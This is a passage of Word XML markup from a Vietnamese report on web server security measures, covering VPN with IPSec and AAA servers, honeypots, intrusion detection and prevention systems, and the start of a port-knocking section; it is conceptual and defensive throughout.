        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="003B0634">
        <w:t xml:space="preserve">Mô hình </w:t>
      </w:r>
      <w:r w:rsidR="00042E81">
        <w:t>Web Server sử dụng VPN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="1D04B69D" w14:textId="5D9C0BA2" w:rsidR="00C546C4" w:rsidRDefault="00C546C4" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>IP Sec</w:t>
      </w:r>
      <w:r w:rsidR="00762720">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00762720">
        <w:t>cung cấp các tính năng bảo mật nâng cao như thuật toán mã hóa tốt hơn và xác thực toàn diện hơn</w:t>
      </w:r>
      <w:r w:rsidR="002D5BF6">
        <w:t>. IPSec có hai chế độ mã hóa</w:t>
      </w:r>
      <w:r w:rsidR="00BE4C4F">
        <w:t xml:space="preserve">: tunnel và </w:t>
      </w:r>
      <w:r w:rsidR="00056DB6">
        <w:t>transport</w:t>
      </w:r>
      <w:r w:rsidR="00AA2BF5">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="003B3B1B">
        <w:t xml:space="preserve"> Tunnel chịu trách nhiệm mã hóa header </w:t>
      </w:r>
      <w:r w:rsidR="00FC33F4">
        <w:t xml:space="preserve">và payload của mỗi gói tin trong khi transport </w:t>
      </w:r>
      <w:r w:rsidR="00BD3B34">
        <w:t>chỉ</w:t>
      </w:r>
      <w:r w:rsidR="00D95000">
        <w:t xml:space="preserve"> thực hiện</w:t>
      </w:r>
      <w:r w:rsidR="00BD3B34">
        <w:t xml:space="preserve"> mã hóa payload</w:t>
      </w:r>
      <w:r w:rsidR="00D95000">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BAF460" w14:textId="77777777" w:rsidR="00154090" w:rsidRPr="00154090" w:rsidRDefault="00C546C4" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="1276"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00265075">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>AAA Server</w:t>
      </w:r>
      <w:r w:rsidR="001F1ABC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="001F1ABC">
        <w:t xml:space="preserve">AAA </w:t>
      </w:r>
      <w:r w:rsidR="00B5103A">
        <w:t>viết tắt cho authentication, authorization and accounting</w:t>
      </w:r>
      <w:r w:rsidR="00DC08E9">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008874D9">
        <w:t>Máy chủ AAA được sử dụng để truy cập an toàn hơn trong môi trường VPN</w:t>
      </w:r>
      <w:r w:rsidR="00253392">
        <w:t xml:space="preserve"> truy cập từ xa. Khi có yêu cầu thiết lập từ máy khách, yêu cầu đó được ủy quyền tới máy chủ AAA</w:t>
      </w:r>
      <w:r w:rsidR="00293BA5">
        <w:t xml:space="preserve">. Sau đó máy chủ sẽ kiểm tra việc xác thực, ủy quyền và tính toán. Bằng cách quản trị hiệu quả máy chủ trong </w:t>
      </w:r>
      <w:r w:rsidR="000B7F0A">
        <w:t xml:space="preserve">mạng VPN và chỉ cho </w:t>
      </w:r>
      <w:r w:rsidR="007B291D">
        <w:t>cấp quyền truy cập cho người dùng thông qua mạng đó</w:t>
      </w:r>
      <w:r w:rsidR="00FA4090">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D27EC9" w14:textId="07C9DC0E" w:rsidR="00C546C4" w:rsidRPr="00265075" w:rsidRDefault="00FA4090" w:rsidP="00E54DE8">
      <w:pPr>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Vì bổ sung thêm </w:t>
      </w:r>
      <w:r w:rsidR="00E9516F">
        <w:t>phương pháp</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bảo vệ trên Web Server</w:t>
      </w:r>
      <w:r w:rsidR="00917A3C">
        <w:t xml:space="preserve"> việc cài đặt VPN</w:t>
      </w:r>
      <w:r w:rsidR="007262BB">
        <w:t xml:space="preserve"> sẽ ngăn chặn tin tặc thực hiện hành vi tấn công trên mạng. Ngày nay việc sử dụng VPN như một lớp bảo mật bổ sung ở </w:t>
      </w:r>
      <w:r w:rsidR="00154090">
        <w:t>nhiều tập đoàn</w:t>
      </w:r>
      <w:r w:rsidR="009073F8">
        <w:t xml:space="preserve"> lớn và đã trở nên phổ biến</w:t>
      </w:r>
      <w:r w:rsidR="00B47CD6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66276D39" w14:textId="5BAC4CBF" w:rsidR="00102B31" w:rsidRDefault="00102B31" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="426"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="29" w:name="_Toc171085489"/>
      <w:r w:rsidR="003A5D1D">
        <w:t>Các biện pháp bảo mật tiên tiến của Web Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="29"/>
    </w:p>
    <w:p w14:paraId="15DB3CC4" w14:textId="1126E0F2" w:rsidR="005D48D6" w:rsidRPr="005D48D6" w:rsidRDefault="005D48D6" w:rsidP="00E54DE8">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Tập chung vào việc áp dụng các công nghệ và phương pháp bảo mật tiên tiến</w:t>
      </w:r>
      <w:r w:rsidR="006851F0">
        <w:t>, nhằm đối phó với những thách thức bảo mật mới. Các biện pháp bảo mật tiên tiến này không chỉ nâng cao khả năng phòng ngừa mà còn cải thiện khả năng phản ứng và phục hồi trước các cuộc tấn công</w:t>
      </w:r>
      <w:r w:rsidR="004C7548">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37205FB4" w14:textId="508F8754" w:rsidR="005D48D6" w:rsidRDefault="00B322AC" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:bookmarkStart w:id="30" w:name="_Toc171085490"/>
      <w:r>
        <w:t>Xây dựng Honey Pots</w:t>
      </w:r>
      <w:bookmarkEnd w:id="30"/>
    </w:p>
    <w:p w14:paraId="6C4E1FAB" w14:textId="05656630" w:rsidR="001941AC" w:rsidRDefault="00DD0993" w:rsidP="00E54DE8">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Những tin tặc tinh vi có đủ phương tiện và kiến thức để xâm nhập vào </w:t>
      </w:r>
      <w:r w:rsidR="008E21D0">
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidR="00707BFE">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="009B50CA">
        <w:t xml:space="preserve">Vì vậy những người bảo vệ cần </w:t>
      </w:r>
      <w:r w:rsidR="00030633">
        <w:t xml:space="preserve">phải phát triển những phương pháp thông minh và tiên tiến. </w:t>
      </w:r>
      <w:r w:rsidR="00310235">
        <w:t>Một trong số đó là honeypots</w:t>
      </w:r>
      <w:r w:rsidR="00613E7B">
        <w:t>, hon</w:t>
      </w:r>
      <w:r w:rsidR="005912F0">
        <w:t>eypots có thể giúp ngăn chặn các cuộc tấn công theo nhiều cách</w:t>
      </w:r>
      <w:r w:rsidR="0083399B">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0088700E">
        <w:t>Cách đ</w:t>
      </w:r>
      <w:r w:rsidR="0083399B">
        <w:t xml:space="preserve">ầu tiên là chống lại những cuộc tấn công </w:t>
      </w:r>
      <w:r w:rsidR="00410BB4">
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="0083399B">
        <w:t>ự động</w:t>
      </w:r>
      <w:r w:rsidR="00B729BE">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00CA0AAE">
        <w:t xml:space="preserve"> Các cuộc tấn công </w:t>
      </w:r>
      <w:r w:rsidR="00866561">
        <w:t xml:space="preserve">này dựa trên các công cụ </w:t>
      </w:r>
      <w:r w:rsidR="00195516">
        <w:t xml:space="preserve">quét ngẫu nhiên </w:t>
      </w:r>
      <w:r w:rsidR="005E2495">
        <w:t>để tìm vị trí dễ bị tấn công</w:t>
      </w:r>
      <w:r w:rsidR="00E956DF">
        <w:t>. Nếu tìm thấy điểm yếu, các công cụ tự động</w:t>
      </w:r>
      <w:r w:rsidR="005867BF">
        <w:t xml:space="preserve"> sẽ tấn công và chiếm quyền điều khiển. Một các mà honeypots</w:t>
      </w:r>
      <w:r w:rsidR="004057FF">
        <w:t xml:space="preserve"> có thể giúp chống lại các cuộc tấn công </w:t>
      </w:r>
      <w:r w:rsidR="003C2698">
        <w:t>như vậy là làm chậm quá trình quét, thậm chí có thể ngăn chặn chúng</w:t>
      </w:r>
      <w:r w:rsidR="00820D55">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B0DB39" w14:textId="3F5EC466" w:rsidR="00DC1F97" w:rsidRDefault="00E50696" w:rsidP="00E54DE8">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Honeypots </w:t>
      </w:r>
      <w:r w:rsidR="00AE5ECF">
        <w:t xml:space="preserve">như một phương tiện để che lấp lỗ hổng bằng cách tạo ra một "bẫy" cho các bên tấn công. Đây là một cơ chế bảo mật rất phức tạp được thiết kế để hoạt động như một cái bẫy, lôi kéo kẻ xâm nhập khai thác một tài nguyên cố ý để lộ, từ đó cho phép người phòng thủ có thời gian thu thập thông tin về kẻ tấn công. </w:t>
      </w:r>
      <w:r w:rsidR="009B3246">
        <w:t xml:space="preserve">Sự đa dạng trong việc sử dụng là điều làm cho honeypots trở nên độc đáo với mục đích của nó: </w:t>
      </w:r>
      <w:r w:rsidR="00F810D0">
        <w:t>một honeypot có thể hoạt động như một sự phân tâm</w:t>
      </w:r>
      <w:r w:rsidR="00F435CE">
        <w:t xml:space="preserve"> cho người tấn công</w:t>
      </w:r>
      <w:r w:rsidR="00BB09F3">
        <w:t>, đóng vai trò như một cơ chế cảnh báo sớm về truy cập trái phép vào máy chủ</w:t>
      </w:r>
      <w:r w:rsidR="00916866">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1598237D" w14:textId="2E9FD0E2" w:rsidR="008B509D" w:rsidRDefault="008B509D" w:rsidP="008B509D">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="50D94D01" wp14:editId="67EADCAD">
            <wp:extent cx="3557492" cy="2827020"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="73216003" name="Picture 1" descr="Honeypot deployed independentl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eypot deployed independently.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948" cy="2830561"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADE0B50" w14:textId="4361E0A7" w:rsidR="008B509D" w:rsidRDefault="00F86144" w:rsidP="00F86144">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="31" w:name="_Toc170814820"/>
      <w:r>
        <w:t xml:space="preserve">Hình 2. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_2. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000F27E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="008538BB">
        <w:t>Mô hình Web Server sử dụng</w:t>
      </w:r>
      <w:r w:rsidR="00B107F8">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A03DD9">
        <w:t>Honeypots</w:t>
      </w:r>
      <w:bookmarkEnd w:id="31"/>
    </w:p>
    <w:p w14:paraId="17C2C785" w14:textId="7AA92ABB" w:rsidR="00916866" w:rsidRDefault="00916866" w:rsidP="00E54DE8">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Có hai loại honeypots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19EA8A4B" w14:textId="11CD19BD" w:rsidR="00916866" w:rsidRDefault="00105ED7" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="001D2769">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Honeypots sản xuất:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0097373F">
        <w:t>dễ sử dụng và chủ yếu được sử dụng bởi các công ty hoặc tập đoàn</w:t>
      </w:r>
      <w:r w:rsidR="008B32F4">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="002F3362">
        <w:t xml:space="preserve">Chúng cung cấp ít thông tin hơn về các cuộc tấn công hoặc kẻ tấn công so với honeypots nghiên cứu. Mục đích của honeypots </w:t>
      </w:r>
      <w:r w:rsidR="002F3362">
        <w:lastRenderedPageBreak/>
        <w:t>sản xuất là giúp giảm thiểu rủi ro. Honeypot này bổ sung giá trị vào các biện pháp bảo mật của tổ chức.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60F9D768" w14:textId="4B183DCC" w:rsidR="00105ED7" w:rsidRPr="001941AC" w:rsidRDefault="00105ED7" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="14"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r w:rsidRPr="001D2769">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Honeypots nghiên cứu:</w:t>
      </w:r>
      <w:r w:rsidR="00BF6895">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A53E8C">
        <w:t>được vận hành bởi các tổ chức nghiên cứu tình nguyện, phi lợi nhuận hoặc các cơ sở giáo dục để thu thập thông tin của cộng đồng Blackhat</w:t>
      </w:r>
      <w:r w:rsidR="004A6BFC">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A95F86">
        <w:t>Honeypots nghiên cứu phức tạp để triển khai và duy trì, ghi lại thông tin chi tiết, và chủ yếu được sử dụng trong các tổ chức nghiên cứu, quân đội hoặc chính phủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45A6092B" w14:textId="324ADEC0" w:rsidR="00B322AC" w:rsidRDefault="00B322AC" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:bookmarkStart w:id="32" w:name="_Toc171085491"/>
      <w:r>
        <w:t>Sử dụng IDPS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="32"/>
    </w:p>
    <w:p w14:paraId="639E7083" w14:textId="73BAFE72" w:rsidR="006A0C28" w:rsidRDefault="002F0B26" w:rsidP="00E54DE8">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Hệ thống Phát hiện và Ngăn chặn Xâm nhập (IDPS) là một phần quan trọng trong bảo mật mạng, được thiết kế để phát hiện và ngăn chặn các hoạt động xâm nhập trái phép. IDPS không chỉ giúp bảo vệ hệ thống khỏi các cuộc tấn công mà còn cung cấp các công cụ để phân tích và hiểu rõ hơn về các mối đe dọa đang đối mặt. Có hai thành phần chính của IDPS: Hệ thống Phát hiện Xâm nhập (IDS) và Hệ thống Ngăn chặn Xâm nhập (IPS)</w:t>
      </w:r>
      <w:r w:rsidR="0046560B">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626C131E" w14:textId="0D67F0C5" w:rsidR="0046560B" w:rsidRDefault="0046560B" w:rsidP="0046560B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A24924A" wp14:editId="04A1B511">
            <wp:extent cx="3931522" cy="2216785"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="745453517" name="Picture 2" descr="A Detailed Analysis of Intrusion Detection Systems and Intrusion Prevention  Systems - CERTStat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etailed Analysis of Intrusion Detection Systems and Intrusion Prevention  Systems - CERTStation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4288" cy="2218345"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="45AD00CD" w14:textId="7D89A4CE" w:rsidR="0046560B" w:rsidRDefault="00F86144" w:rsidP="00F86144">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="33" w:name="_Toc170814821"/>
      <w:r>
        <w:t xml:space="preserve">Hình 2. </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> SEQ Hình_2. \* ARABIC </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="000F27E2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="005165E4">
        <w:t>Mô hình Web Server sử dụng IDPS</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:p w14:paraId="3E48BFA3" w14:textId="58BD00EB" w:rsidR="00CF61D9" w:rsidRDefault="002427E9" w:rsidP="00E54DE8">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Hệ thống Phát hiện Xâm nhập (IDS): </w:t>
      </w:r>
      <w:r w:rsidR="00BE5E87">
        <w:t>IDS chủ yếu được thiết kế để giám sát lưu lượng mạng và phát hiện các hành vi bất thường hoặc các dấu hiệu của các cuộc tấn công. Khi phát hiện một hoạt động đáng ngờ, IDS sẽ phát ra cảnh báo cho quản trị viên.</w:t>
      </w:r>
      <w:r w:rsidR="00385154">
        <w:t xml:space="preserve"> Có hai phương pháp chính để phát hiện xâm nhập</w:t>
      </w:r>
      <w:r w:rsidR="00755382">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5516E389" w14:textId="0F05442D" w:rsidR="00755382" w:rsidRDefault="008E46CD" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Dựa trên chữ ký (Signature-based)</w:t>
      </w:r>
      <w:r>
        <w:t>: So sánh lưu lượng mạng với các mẫu đã biết của các cuộc tấn công. Phương pháp này rất hiệu quả với các mối đe dọa đã biết nhưng không thể phát hiện các cuộc tấn công mới hoặc các biến thể của chúng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED19BE5" w14:textId="4BB2D288" w:rsidR="008E46CD" w:rsidRDefault="001D2769" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Dựa trên bất thường (Anomaly-based)</w:t>
      </w:r>
      <w:r>
        <w:t>: Xác định các hành vi bất thường so với hoạt động thông thường của mạng. Phương pháp này có thể phát hiện các mối đe dọa mới nhưng có thể tạo ra nhiều cảnh báo sai (false positives).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08F3C133" w14:textId="3A817463" w:rsidR="001D2769" w:rsidRDefault="001D2769" w:rsidP="00E54DE8">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Hệ thống Ngăn chặn Xâm nhập (IPS):</w:t>
      </w:r>
      <w:r w:rsidR="00251774">
        <w:t xml:space="preserve"> IPS không chỉ phát hiện mà còn có khả năng tự động ngăn chặn các cuộc tấn công. Khi phát hiện một mối đe dọa, IPS có thể thực hiện các hành động như chặn lưu lượng, kết nối hoặc thậm chí cấu hình lại server để ngăn chặn tấn công</w:t>
      </w:r>
      <w:r w:rsidR="009C1B39">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="0081520E">
        <w:t>IPS sử dụng các phương pháp tương tự như IDS để phát hiện xâm nhập, nhưng đi kèm với các biện pháp ngăn chặn tự động.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D31C662" w14:textId="0FACF2B9" w:rsidR="00022A12" w:rsidRDefault="00022A12" w:rsidP="00AE3C7D">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>IDPS có thể được phân loại dựa trên vị trí và phạm vi giám sát của chúng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03E22E4B" w14:textId="343F7751" w:rsidR="00022A12" w:rsidRDefault="00BC48DD" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Network-based IDPS (NIDPS)</w:t>
      </w:r>
      <w:r>
        <w:t>: Giám sát lưu lượng mạng tại một hoặc nhiều điểm trong mạng. Thường được đặt ở các điểm chiến lược như sau tường lửa hoặc gần các thiết bị đầu cuối quan trọng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51F27FAD" w14:textId="23D72D09" w:rsidR="00BC48DD" w:rsidRDefault="00BC48DD" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Host-based IDPS (HIDPS)</w:t>
      </w:r>
      <w:r>
        <w:t>: Giám sát hoạt động trên các thiết bị cá nhân như máy tính, máy chủ. HIDPS có thể phát hiện các hành vi bất thường hoặc các thay đổi trong hệ thống tập tin của máy chủ.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ACF2430" w14:textId="4D1A9D16" w:rsidR="00BC48DD" w:rsidRDefault="00BC48DD" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Wireless IDPS (WIDPS)</w:t>
      </w:r>
      <w:r>
        <w:t>: Giám sát lưu lượng mạng không dây và phát hiện các hoạt động bất thường hoặc không mong muốn trong mạng Wi-Fi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A8F1653" w14:textId="7E5E5513" w:rsidR="00725BB9" w:rsidRPr="006A0C28" w:rsidRDefault="00D84090" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="16"/>
        </w:numPr>
        <w:ind w:left="1276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>Network Behavior Analysis (NBA)</w:t>
      </w:r>
      <w:r>
        <w:t>: Tập trung vào việc phát hiện các hành vi bất thường trong lưu lượng mạng, như các cuộc tấn công DDoS hoặc các hoạt động quét mạng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC84525" w14:textId="4838534C" w:rsidR="00BB6384" w:rsidRDefault="0041564F" w:rsidP="00AF4D34">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="567" w:hanging="567"/>
      </w:pPr>
      <w:bookmarkStart w:id="34" w:name="_Toc171085492"/>
      <w:r>
        <w:t>Gõ cửa</w:t>
      </w:r>
      <w:r w:rsidR="00215D6C">
        <w:t xml:space="preserve"> cổng (Port-Knocking)</w:t>
      </w:r>
      <w:r w:rsidR="00BB6384">
        <w:t xml:space="preserve"> trên Web Server</w:t>
      </w:r>
      <w:bookmarkEnd w:id="34"/>
    </w:p>
    <w:p w14:paraId="10845EE0" w14:textId="48ABEF43" w:rsidR="00462826" w:rsidRDefault="00FB4337" w:rsidP="00E54DE8">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quét cổng hay có tên thuật ngữ là </w:t>
      </w:r>
      <w:r w:rsidR="00BC2E9D">
        <w:t>Port Scanning, là một trong những công cụ chính</w:t>
      </w:r>
      <w:r w:rsidR="009133DD">
        <w:t xml:space="preserve"> trong tay kẻ tấn công</w:t>
      </w:r>
      <w:r w:rsidR="00BC2E9D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E03A9F">
        <w:t>gây rắc rối cho cộng đồng bảo mật</w:t>
      </w:r>
      <w:r w:rsidR="001A14F5">
        <w:t xml:space="preserve">. Một giải pháp </w:t>
      </w:r>
      <w:r w:rsidR="00E025A4">
        <w:t xml:space="preserve">được biết đến như gõ của cổng </w:t>
      </w:r>
      <w:r w:rsidR="009473DE">
        <w:t xml:space="preserve">hay có tên thuật ngữ Port-Knocking, </w:t>
      </w:r>
      <w:r w:rsidR="00D0041C">
        <w:t>một cơ chế rất tinh vi để ngăn chặn kẻ tấn công khám phá các cổng đang mở trên server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290A01BC" w14:textId="54053D33" w:rsidR="00636A46" w:rsidRDefault="004822AA" w:rsidP="00E54DE8">
      <w:pPr>
        <w:ind w:firstLine="709"/>
      </w:pPr>
      <w:r>
        <w:t>Quy trình port knocking là một chuỗi gửi gói tin rất đơn giản nhưng khá thông minh, bắt chước câu chuyện "Open Sesame" nổi tiếng từ các câu chuyện cổ tích. Để có thể kết nối với một cổng cụ thể</w:t>
      </w:r>
      <w:r w:rsidR="0039290F">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="0039290F" w:rsidRPr="0039290F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0039290F">
        <w:t>trước tiên phải gửi các gói tin đến các cổng đóng được chỉ định trước theo một chuỗi đã được xác định trước để thông báo cho tường lửa rằng nó phải mở cổng</w:t>
      </w:r>
      <w:r w:rsidR="00EC5E49">
